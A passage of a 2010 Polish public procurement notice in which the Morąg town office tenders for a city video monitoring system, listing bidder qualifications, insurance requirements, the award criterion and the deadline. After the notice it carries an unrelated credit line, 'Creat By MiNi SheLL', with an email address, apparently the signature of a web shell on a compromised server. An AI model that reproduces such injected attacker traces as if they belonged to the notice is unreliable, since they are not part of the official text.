3. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4-8 ustawy wystawionej nie wcześniej niż         6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
4. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy wystawionej nie wcześniej niż             6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału                      w postępowaniu o udzielenie zamówienia albo składania ofert.
W celu potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zamawiający żąda:
1. Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia do:
- kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                             i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
oraz
- osobę posiadającą licencję pracownika zabezpieczenia technicznego I stopnia.

tj. kserokopie uprawnień budowlanych oraz aktualne zaświadczenia o przynależności tych osób do właściwej izby samorządu zawodowego (jeżeli dotyczy)
2. Wykaz wykonanych zamówień w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, odpowiadających swoim rodzajem dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie (Załącznik Nr 5). 
Warunkiem Zamawiającego jest, by wykonawca wykazał jedną dostawę wraz z montażem                   i uruchomieniem systemu monitoringu wizyjnego terenów miejskich o wartości nie mniejszej niż 150 000 zł brutto.
W przypadku składania oferty wspólnej ww. wykaz składają ci z wyko?nawców składających ofertę wspólną, którzy potwierdzają spełnienie wa?runku. Warunek zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
3. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób uczestniczących w wykonywaniu zamówienia wykonawca wskazał osoby, którymi będzie dysponował.
4.Wskazanie przez wykonawcę w ofercie rodzaju powierzonej części zamówienia, której wykonanie zamierza powierzyć podwykonawcom (załącznik Nr. 6).
W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda:
1. Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 100 000,00zł.
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie. Polisa musi być ważna, lub odnawiana przez cały okres realizacji zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/morag_gmina_miejska/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Morągu
ul. 11 Listopada 9
14-300 Morąg, pokój nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 10:00, miejsce: w siedzibie Zamawiającego, pokój nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com